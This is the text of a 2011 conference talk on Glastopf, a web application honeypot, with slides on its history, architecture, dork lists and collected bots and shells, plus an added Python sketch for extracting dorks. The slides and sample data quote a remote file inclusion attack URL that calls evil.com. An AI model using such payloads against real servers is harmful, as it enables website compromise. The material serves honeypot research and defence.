Glastopf - Looking for trouble?
Low interaction web application honeypot
Lukas Rist
Glastopf Project
March 21, 2011
Agenda
• Glastopf Project
• Glastopf Web Application Honeypot
• Awesome Live Action
• Q&A
Lukas Rist Glastopf - Looking for trouble?, 1 of 14
Boring History Part
• Started December 2008, Minimal Python Web Server
• GSoC 2009
• End of 2009, joining Honeynet Project
• Bachelor Thesis: GlastopfNG
• GSoC 2011?
Project Goals
• Powerful Web Application Honeypot
• Collecting Attacks
• Gain Intelligence
• Fighting Cyber Threats (script kiddies?)
Introducing the Glastopf Honeypot
• Motivation
• Architecture
• Dynamic Dork List
• Distributed Set-Up
• GlastopfNG
Motivation
• Lots of Attacks against Web Servers
• Sensitive Data & Trust
• Compromised Servers
• New Approach vs. Other Projects
Architecture
Dynamic Dork List
• Previous: Static templates
• New, dynamic and automated Approach
• Disadvantages
• Attack: http://victim.com/vulnerable.php?color=http://evil.com/bad.txt
• Dork: vulnerable.php
• Search Robot crawls the list
• Search request: inurl:vulnerable.php
• Search result: http://example.com/
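The dork extraction step above, as an added sketch that is not Glastopf's own code: it takes the script name from a request whose parameter value is a remote URL and adds it to the list the sensor publishes. The names extract_dork and DorkList, the scheme list and the file-name whitelist are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed set of schemes that mark a parameter value as a remote file.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# The dork comes from attacker-controlled input, so only plain file names
# are accepted before they are stored or echoed into a served page.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,64}")


def extract_dork(url):
    """Return the requested script name if a parameter carries a remote URL."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    if not any(value.lower().startswith(REMOTE_SCHEMES) for _, value in params):
        return None  # no remote-file-inclusion attempt in this request
    name = parts.path.rsplit("/", 1)[-1]
    return name if SAFE_NAME.fullmatch(name) else None


class DorkList:
    """Hypothetical in-memory dork list, keyed by script name."""

    def __init__(self):
        self.hits = {}

    def observe(self, url):
        """Record one request; return the dork it contributed, if any."""
        dork = extract_dork(url)
        if dork is not None:
            self.hits[dork] = self.hits.get(dork, 0) + 1
        return dork

    def links(self):
        """Links the sensor would serve so a search robot indexes the dorks."""
        return ['<a href="/%s">%s</a>' % (d, d) for d in sorted(self.hits)]


if __name__ == "__main__":
    # Constructed sample requests; the first is the attack from the slide.
    sample = [
        "http://victim.com/vulnerable.php?color=http://evil.com/bad.txt",
        "/index.php?page=2",
        "/<script>.php?x=http://evil.com/bad.txt",
    ]
    dorks = DorkList()
    for url in sample:
        print(url, "->", dorks.observe(url))
    print(dorks.links())
```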
Distributed Set-Up
• Many Domains
• Central Database
• htaccess redirects
• Invisible Links
• Wordpress Plug-in
Stuff we collect
• ID Files
• Spreader, (DDoS) Bots
• Shells, Backdoors
• Drive-by Kits
• ...
GlastopfNG
• Same approach, different Implementation
• Modularity
• Lightweight XML Configuration and Rules
• Porting Modules
Web Server Botnets
• Imagine a Web Server Botnet's Power
• Between 10 and 1k Bots
• PHP Sandbox
• Dirty Python IRC Client, HALE?
Awesome Live Action (aka Demo)
• Live Glastopf Sensor
• Attacking Glastopf
• Dynamic Dork List
• Collected File
• (IRC C&C Server)
Questions, Answers and Contact
• Questions?
• Answers
• Contact: http://glastopf.org
• Lukas: [email protected]
• Thanks!